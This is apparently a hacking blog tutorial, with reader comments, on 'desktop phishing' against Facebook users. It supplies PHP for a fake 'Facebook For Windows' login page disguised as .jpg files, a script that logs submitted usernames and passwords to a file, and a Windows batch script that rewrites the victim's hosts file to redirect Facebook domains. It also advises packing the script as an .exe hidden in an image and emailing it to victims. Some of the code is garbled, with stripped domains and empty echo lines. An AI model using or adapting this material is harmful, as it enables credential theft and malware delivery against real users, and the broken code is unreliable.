Advanced Level Facebook Desktop Phishing Method – 2015 (Undetectable)

Advanced Level Facebook Desktop Phishing-

As I’ve mentioned in my previous article, in this post we will be exploring a bit of batch file programming and then will move ahead implementing that in facebook hacking by desktop phishing. The advantage here is, the victim will not be able to identify the fake page since the URL in the address looks similar to the genuine one and this post is including a new php code for making phishing page that is undetectable and can bypass security check of a hosting site.

This tutorial would be a non-exhaustive guide for beginners. If you have not read my previous articles “DNS Hijacking” and “Hacking facebook accounts using phishing” then I might ask you to read it before continuing reading this further, since that would give you a prerequisite knowledge upon the topics that we are going to discuss today.

Difference between phishing and desktop phishing

In phishing

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker.

3. Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by
looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing

1. Attacker sends an executable file to victim and victim is supposed to double click on it. Attacker’s job is done.

2. Victim types the domain name of orignal/genuine website and is taken to our fake login page.

But the domain name remains the same as typed by victim
and victim doesn’t come to know.

3. Rest of the things are same as in normal phishing.

What is Hosts File?

The hosts file is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:WindowsSystem32driversetc, Whenever we visit any website, say , an query is sent to Domain Name Server(DNS) to look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit , we would be taken to this No query for resolving IP address associated with would be sent to DNS.

What is the attack?

I hope you have got an idea that how modification of this hosts file on victim’s computer can be misused.
We need to modify victim’s hosts file by adding the genuine domain name and IP address of our fake website /phishing page.Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Steps to perform attack:

Step 1. Making undetectable phishing page

What you need :

for programming (Download :

Steps :

Use Notepad++ for the steps given below

1) Copy this code and paste it in a new document and save it as index.php

$id = $_GET[“id”];
if ($id == “facebookforwindows”) {
$myFile = “SoftwareDownload.jpg”;
$fh = fopen($myFile, ‘r’);
$theData = fread($fh, 500000);
echo $theData;

$myFile1 = “Follow.jpg”;
$fh1 = fopen($myFile1, ‘r’);
$theData1 = fread($fh1, 500000);
echo $theData1;

Note : Change “($id == “facebookforwindows”)” with “($id == “YOUR_PASSWORD”)“

(You can put any password as YOUR_PASSWORD)

2) Copy below code and paste it in a new document and save it as Follow.jpg (Code Not By ME)

<!DOCTYPE html>
  <title>Find your Facebook ID – a 5-second easy tool for locating your Facebook numeric personal ID</title>
  <meta name=”description” content=”If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool.” />
  <link rel=”stylesheet” href=”reset.css” type=”text/css” media=”screen”>
  <link rel=”stylesheet” href=”style.css” type=”text/css” media=”screen”>

 <script src=””></script>  <script src=”script.js” type=”text/javascript” charset=”utf-8″></script>
  <meta property=”fb:admins” content=”1146295886″ />
  <form action=”” method=”post”>

 <label for=”fb_profile_url” class=”text-input-label fb_profile_url-text-input-label”>
  Enter your personal Facebook profile URL:

 <input type=”text” name=”fb_profile_url” value=”” class=”nr-text” size=”45″ placeholder=”” />
 <input type=”hidden” name=”unsanitized” class=”nr-hidden hidden-input-for-unsanitized” />
  <input type=”submit” value=”Lookup numeric ID…” class=”button-primary”>

 <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1>

 <p id=”description”>
  For integrations of certain Facebook social plugins, like the “Like” button and “Like box”, and others, Facebook
  requires that you know your Facebook numeric user ID.  Unfortunately, they make this very difficult to find, especially
  if you have a so-called “vanity” personalized profile URL. If you can’t find your Facebook ID, or don’t know what it is
  and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your
  personal profile page.


<script type=”text/javascript”>
  var _gaq = _gaq || [];
  _gaq.push([‘_setAccount’, ‘UA-3361652-13’]);
  (function() {
    var ga = document.createElement(‘script’); ga.type = ‘text/javascript’; ga.async = true;
    ga.src = (‘https:’ == document.location.protocol ? ‘https://ssl’ : ‘http://www’) + ‘’;
    var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ga, s);

3) Copy this code and paste it in a new document and save it as data.php

header (‘Location:’);
$handle = fopen(“PassFace.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
fwrite($handle, “rn”);

4) Copy this code and paste it in a new document and save it as SoftwareDownload.jpg

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN” “”>
<meta http-equiv=”Content-Type” content=”text/html; charset=ISO-8859-1″>
<title>Facebook For Windows : Welcome</title>
<style type=”text/css”>
html, body
   height: 100%;
   width: 1px;
   height: 50%;
   margin-bottom: -360px;
   width: 1250px;
   height: 720px;
   margin: 0 auto;
   position: relative;
   clear: left;
<style type=”text/css”>
   margin: 0;
   padding: 0;
   background-color: #6579A8;
   color: #000000;
<style type=”text/css”>
   font-family: Arial;
   font-size: 24px;
   font-weight: normal;
   font-style: normal;
   text-decoration: none;
   color: #000000;
   margin: 0 0 0 0;
   padding: 0 0 0 0;
   display: inline;
   color: #90F518;
<!–[if lt IE 7]>
<style type=”text/css”>
   img { behavior: url(“”); }
<div id=”space”><br></div>
<div id=”container”>
<div id=”bv_Image1″ style=”margin:0;padding:0;position:absolute;left:0px;top:0px;width:1093px;height:609px;text-align:left;z-index:0;”>
<img src=”images/Facebook_Box.png” id=”Image1″ alt=”” align=”top” border=”0″ style=”width:1093px;height:609px;”></div>
<div id=”bv_Image2″ style=”margin:0;padding:0;position:absolute;left:207px;top:210px;width:168px;height:168px;text-align:left;z-index:1;”>
<img src=”images/Facebook.png” id=”Image2″ alt=”” align=”top” border=”0″ style=”width:168px;height:168px;”></div>
<div id=”bv_Text1″ style=”margin:0;padding:0;position:absolute;left:378px;top:224px;width:389px;height:90px;text-align:left;z-index:2;”>
<h3>Download Facebook For Windows :<br>
</h3><font style=”font-size:13px” color=”#000000″ face=”Arial”>size : 6 MB.<br>
Platform : Windows 8.1<br>
Security Status : Active</font><h3><br>
<div id=”Html1″ style=”position:absolute;left:378px;top:307px;width:625px;height:50px;z-index:3″>
<b>Login to Donwload this Application :</b><br/>
<form name=”input” action=”data.php” method=”post”>
Username : <input type=”text” name=”username” />
Password : <input type=”password” name=”password”>
<input type=”submit” value=”Download” action=”data.php” method=”post”/>

5) Keep all above files in a single folder and name it as “xyz” (Anything you want)

6) Now create a folder inside that folder (“xyz“) and name it as “images” (Put exact name)

7) Download these images and put it inside “images

Image 1 : or Click here
Image 2 : or Click here

Now if you followed all the steps carefully, It will look similar to this :

You are successfully created the phishing page and We need this files in next steps.

Step 2. Setting up Xampp web server

You can use wamp or xammp , i would recommend you to use xammp and this software will help you to host phishing on your local machine.

Web server can refer to either the hardware (the computer) or the software (the computer application) that helps to deliver Web content that can be accessed through the Internet.

1) First Download and install xampp on your PC, Start Apache and Msql services

2) Copy the 5 files (including the foldr named ‘images‘) we are created in step 1, and paste its all in ht docs folder which should be under Xammp (place were you installed xampp)
(normally ht docs folder should be in the path: c:xampphtdocs)

Step 3. Setting up static vpn

I will Use proXPN VPN for this Tutorial but i recommend you to use Strong Open VPN as it is very stable you can download it from here.

Install ProXPN VPN or any other static VPN, i recommend you to use Strong Vpn as it very stable and gives you a static IP Once you install and run it, you will get a static IP (vpn).

Now you have a static ip for your Localhost.

Step 4. Creating a batch(.bat) file to accomplish replacing victims hosts file

Now we have to replace some text in the victims Host file which is at C:windowssystem32driversetc ,You can do this by many ways either by using a SFX archive or using a batch file for this tutorial we will use a batch file to accomplish the job.

Here is the batch program that I was talking about in my last post ‘DNS hijacking‘. As we have seen that, adding an IP address with a corresponding domain name in the host file would redirect you to webpage as you desire with a desired domain name.

So, we are going to take this into next level for hacking purposes. We’ll change the host file in the victim machine with the help of a batch program and redirect the victim to our fake login page. The only thing you need to consider is sending the batch program to the victim machine and running it.

Here is the batch program that can be used to manipulate the HOSTS file.

@echo off
set hostspath=%windir%System32driversetchosts

echo >> %hostspath%
echo >> %hostspath%
echo >> %hostspath%
echo >> %hostspath%


Replace the ip address( with the static IP address of your vpn (The static ip vpn address you got in step 3), and save it as ‘anyname.bat‘.

Let us now discuss what exactly the above code does. The second line of the code above takes the admin privileges over the ‘hosts’ file, so that editing can be done. Then we move into the path where the ‘hosts’ file is located and then we write 4 lines into the file. Those lines of codes are responsible for the redirection of the user. Therefore, we try to redirect all the possible combinations of facebook addresses to the IP that is provided.

Remember, executing the above code containing file in the victim’s machine is your personal concern and hence I’m not describing the methodologies of spreading your code.

Step 5. Sending the file to victim

You can also change the .bat file into .exe file using batch to exe converter. Click the link to learn how to convert a batch file into an executable.

After successfully converted to anyname.exe file you can do one more step to hide this .exe file in an image file, follow my previous guide: How To Make A Virus And Hide In An Image File (FUD)

Now send the file via email or upload the file to a site and ask the victim to download the file , After the victim downloads and clicks the file, his host file will be replaced ,So now when ever the victim enters He will be redirected to our Phisher Page, But the URL will remain as

To see all the victims credentials and Password open newly created log.txt file which is under ht docs folder

You are done.

Note: Use this article for educational purpose only


Sharing is caring!

32 thoughts on “Advanced Level Facebook Desktop Phishing Method – 2015 (Undetectable)

    1. Mr Josh Das, Thank you for your valuable feedback.

      You are right, the batch file is not working and it was my mistake…sorry, but i have the working batch program here :

      @echo off
      set hostspath=%windir%System32driversetchosts

      echo >> %hostspath%
      echo >> %hostspath%
      echo >> %hostspath%
      echo >> %hostspath%


      Replace the ip address with your static ip

    2. Thnx, it updated the host file,however I am now,hitting on an error, my Xapmm is on! but when I use the browser to redirect it to facebook,it wont go to my static IP, it goes to the original facebook page! n when I hit the ip in address bar,there is also an error in Index file line 2!!! please,fix let me know brother!!! m/

    1. If you you want use this phishing method with android users then you have to use android hosts tweaks instead of Creating a batch(.bat) file to accomplish replacing victims hosts file…….and you can also use Bit Web Server app instead of Xampp web server

  1. I'm getting "Notice: Undefined index: id in C:xampphtdocsindex.php on line 2".

    What am I missing in that line of the index.php file? Thanks.

    1. @Irshad Pathoor
      Notice: Undefined index: id in C:xampphtdocsindex.php on line

      have already done that, turned on these two services, what i'm missing sir, idk. please help

  2. I did exactly like you but after altering host file on my window 8 system, my browser begin to stop opening facebook page by showing "unable to connect to internet" error on browser page. After running Apache and Mysql servers from xampp, the problem still persists. What I'm doing wrong?

    I didn't install vpn software because I already have a static IP.

  3. @Irshad Pathoor
    Sir can we use id from "no-ip" software? as it is gives us static ip type thing, if not, is there any free vpn to give us static ip?

  4. I was just looking for this info for a while. After 6 hours of continuous Googleing, finally I got it in your web site. I wonder what’s the lack of Google strategy that do not rank this type of informative websites in top of the list. Generally the top web sites are full of garbage.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search above and press enter to search. Press ESC to cancel.

Back To Top

So glad to see you sticking around!

Want to be the first one to receive the new stuff?

Enter your email address below and we'll send you the goodies straight to your inbox.

Thank You For Subscribing

This means the world to us!

Spamming is not included! Pinky promise.